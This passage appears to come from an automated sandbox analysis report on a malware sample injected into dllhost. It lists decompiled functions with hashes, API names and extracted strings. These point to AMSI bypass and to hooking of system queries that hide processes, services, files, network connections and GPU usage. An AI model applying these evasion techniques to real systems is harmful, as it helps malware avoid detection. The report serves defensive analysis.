                          • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                          • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                          • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                          • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                          • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: 4ecb0336c81636058d33181dba2a60dac6b7f71b847be35678b181947af84d2e
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: 8AB1A33221A7918AEB74DF25E448799A3A5F744BA4F569026EE0D73794DF35CDC0C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: e9c1a1d1fb91d9bcc67582c924eee4dc52c3241cd64278691c7c27ab1b54eb05
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: 3FB1BE2321A7918AEB78CF2AD4497A9A3A4F744BA4F165026EE0D53F98DF35CDC0C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction ID: 7b2edd68b2cf942dec85651d68f36e504893090945ed746985f584e6b9b7fa95
                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction Fuzzy Hash: 7231647621AB808AEB608F60E8947EE7374F784754F45802ADF4D57B99DF78C588C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction ID: 400e0a6dcedabddb45cfe6a8e65bc0d329bd527d01e78466e9062d12d5d02baa
                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction Fuzzy Hash: E931507620AB808AEB648F60E8987ED73B4F784754F45442ADF4E4BB95DF78C588C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction ID: fd25328669f3b301c127f384fb19632af64165c13a34a40e463e8603ebf3886e
                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction Fuzzy Hash: 82418E36219F808AEB60CF34E8487AE73A4F788764F514225EE9D47B99DF38C195CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction ID: be42197ef7396032113a9b27482aec5978ccf30de4e2f4fc0517c9bef2e25208
                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction Fuzzy Hash: D8414F37219F808AEB60CF25E8487AE73A4F788764F550115EE9D47B99DF38C595CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: 5463dafe268c8ce6a3f239741ffa6bab211b1c714c3692e53edf3d41bf42a82a
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: F3A1E52270E7814DFB20DB75A8883AD6BE1F781BB4F164115DE9D3BA99DA38C4C2C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: cedc1d6cb2350a0d694990548625e4e6501e1838b357de6e4865c17ff5e30b88
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: A7A1D42370E7814DFB209B75A4883AD6BE1F781BB4F564115DE9D2BEA9DA38C4C2C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: 547277f10f1676f6738e2e1c39527bcbc6ec91cbfc2cd81ada411b9411a39e93
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction Fuzzy Hash: 3D712F3631AF5089EB10DF65E898A9D33A4FF89BA8F425121DD4D57B69EF38C484C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: 00a9c684c7b30d5a74dffd76b5fc041a9779bb712e4558cfc1c74f24b3dd756f
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction Fuzzy Hash: F6714F3B31AB5489EB10DF25E898A9D33B4FB89BA8F465121DE4E57B69DF34C484C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: a642429306fadcb36ed49255003d2077e1bee25b7b6f182b40a733f0a74b1571
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: B0517E6551AB4AADFB00EF69EC8D7D43320BB84764F828523DC0D22966DF7882DAC341
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: f3c268bc9fe8c5d20f36ff3f55ef6961ae8679e312a569bdc6c3b7a4de25a447
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: 9C51A26551AB4AADFB00EF68EC9D7D43360FB54375F820523AC0E06976DE3886DAC351
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction ID: 17681605820242942e7001277f7a4d29f71c619d0e52f1e48071c8d5ed8c163b
                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction Fuzzy Hash: F0516F3621AB849AE724CF62E85875AB7A1F789FA8F458124DE4D07758EF3CC089C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction ID: 1ca63df4ed55ab6f973c19076e8d116ccd9446a1aab6db60aac1e9ddaf33533f
                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction Fuzzy Hash: BA513A36219B849AE764CF66E84C75A77E1F789FA8F454124DE4E07B68DF3CC0898700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: cf4b9fd1faf2b228bb9fcc891e81f1d88939b55e4c39022a81b9dc6e763bf395
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: 6651FE2170FB1499FF249F26A8087AA2390BB48BB0F5A47249E3D677D4EF38C485C750
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: e7a0ee0770d191a760ea4b3cd29ffb016bdfc6dc188c86059420d47bbaca2541
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: C851E12270B71489EF159B16A80C7A92390BB58BB0F5A0B259E3E47BD4EF3CC485C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Running Time
                          • API String ID: 1943346504-1805530042
                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction ID: 41c442bdbf69b5b40bd8a313562a5301532673e8b9598099d0eacbe4d71dda6e
                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction Fuzzy Hash: 1031A522609B509EEB35DF12B84C799B3A0F788BE5F464525DE4D63624DF3CC49A8740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Running Time
                          • API String ID: 1943346504-1805530042
                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction ID: 57d12a3365b6e07ed0e95a8fa90399dcc80eb5b0e41324388e31b4079b09a1b1
                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction Fuzzy Hash: 7B31D223A19B819EEB31DF12A84C759A3E0F788BE5F460525DE4E47A34DF3CD49A8340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Utilization Percentage
                          • API String ID: 1943346504-3507739905
                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction ID: 2e179f4c9f39d4e2f2fe1cb8faeb430fafffdca9eb9b8c0453aed5868486359b
